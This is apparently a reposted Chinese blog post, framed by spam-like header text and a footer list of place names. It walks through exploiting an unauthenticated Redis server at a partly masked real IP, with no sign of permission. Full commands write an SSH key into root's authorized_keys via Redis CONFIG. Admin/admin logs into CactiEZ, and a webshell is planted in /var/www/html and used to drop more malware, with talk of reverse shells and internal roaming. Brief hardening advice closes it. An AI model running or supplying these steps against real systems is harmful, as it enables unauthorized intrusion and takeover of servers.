91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

利用未授權的redis寫webshell

發布時間:2020-07-11 00:37:52 來源:網絡 閱讀:2850 作者:jamesmeng10 欄目:安全技術


最近redis的話題比較多,因此就有了下面這個故事。


目標IP:210.73.90.xxx


利用漏洞:未授權的redis訪問


漏洞利用1:


1)本地生成秘鑰

root@GanDolf:~# ssh-keygen  -t rsa


利用未授權的redis寫webshell

2)將公鑰寫入一個文件

root@GanDolf:~# cd /root/.ssh/

root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)連接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@GanDolf:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh

4)連接服務器

root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

發現為開啟22端口

到此此方法失敗


漏洞利用2:


nmap掃描結果:


80 443 開放


訪問80原來是CactiEZ v10版本
嘗試弱口令登錄admin admin登錄成功,發現無長傳路徑。

利用未授權的redis寫webshell


嘗試redis寫webshell

前提:網站的物理路徑

手動幾次沒爆成功


轉向挖CactiEZ v10 的一些安裝信息
于是乎,下載CactiEZ v10 自己搭建虛擬安裝,啟動找出物理路徑為:

/var/www/html


于是利用redis寫shell

利用未授權的redis寫webshell

于是菜刀連起:

利用未授權的redis寫webshell

最后丟個小碼。看看能不能挖到啥東西,后續可以反彈到本地,內容漫游下(好多交換機,主機^__^)

利用未授權的redis寫webshell

利用未授權的redis寫webshell

最后總結關于redis的安全建議:


1)修改默認端口
2)監聽本地端口
3)使用非root啟動,否則出現漏洞1,直接拿到root權限
4)修改配置文件,禁用相關命令

# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

山西省| 芮城县| 土默特右旗| 县级市| 沁源县| 彰化县| 都兰县| 巴塘县| 孟津县| 潜山县| 榆社县| 墨竹工卡县| 石门县| 南京市| 凤冈县| 霍州市| 长泰县| 通海县| 临江市| 孝感市| 咸宁市| 耒阳市| 同心县| 扎囊县| 旬邑县| 遵化市| 哈巴河县| 大宁县| 海淀区| 阳信县| 开封市| 合肥市| 扬州市| 湖南省| 浮山县| 砚山县| 泰兴市| 甘肃省| 新密市| 威信县| 右玉县|